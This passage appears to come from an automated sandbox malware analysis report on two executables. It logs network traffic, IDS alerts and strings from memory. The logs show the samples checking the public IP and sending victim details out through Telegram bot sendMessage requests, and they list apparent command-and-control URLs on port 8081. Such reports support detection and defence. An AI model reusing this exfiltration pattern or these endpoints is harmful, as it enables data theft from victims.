                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:54:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:04:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 132.226.8.169 132.226.8.169
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49693 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49689 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49690 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49686 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49683 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49681 -> 132.226.8.169:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49684 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49708 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49688 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49711 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49712 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49682 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.7:49685 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2020:54:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:04:06%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:38:51 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 14:38:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: svchost.exe, 0000000D.00000002.2132995741.0000022AEB8C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
                Source: svchost.exe, 0000000D.00000002.2132640961.0000022AEB800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                Source: qmgr.db.13.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                Source: edb.log.13.dr, qmgr.db.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                Source: PvAmrCZENy.exe, 00000000.00000002.906373389.00000000032BC000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.942426959.0000000002970000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000025D1000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F74000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002760000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002F6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                Source: svchost.exe, 0000000D.00000003.1206366037.0000022AEB710000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.dr, qmgr.db.13.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: qmgr.db.13.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe1C:
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002621000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002691000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: PvAmrCZENy.exe, 00000000.00000002.909841529.0000000004A53000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002621000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000003949000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 00000008.00000002.945371389.0000000004149000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: PvAmrCZENy.exe, 00000007.00000002.2131837876.00000000026B8000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.0000000002691000.00000004.00000800.00020000.00000000.sdmp, PvAmrCZENy.exe, 00000007.00000002.2131837876.000000000264B000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002E5A000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EC8000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2132407409.0000000002EA0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: PvAmrCZENy.exe, 00000007.00000002.2137565262.000000000368C000.00000004.00000800.00020000.00000000.sdmp, yxXYABHh.exe, 0000000C.00000002.2138512374.0000000003E9B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
